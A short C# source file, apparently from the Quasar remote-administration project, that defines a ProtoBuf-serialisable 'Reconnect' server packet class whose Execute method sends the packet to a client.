Quasar/Server/Core/Packets/ServerPackets/Commands/Reconnect.cs

16 lines
267 B
C#

using ProtoBuf;
namespace Core.Packets.ServerPackets
{
[ProtoContract]
public class Reconnect : IPacket
{
public Reconnect() { }
public void Execute(Client client)
{
client.Send<Reconnect>(this);
}
}
}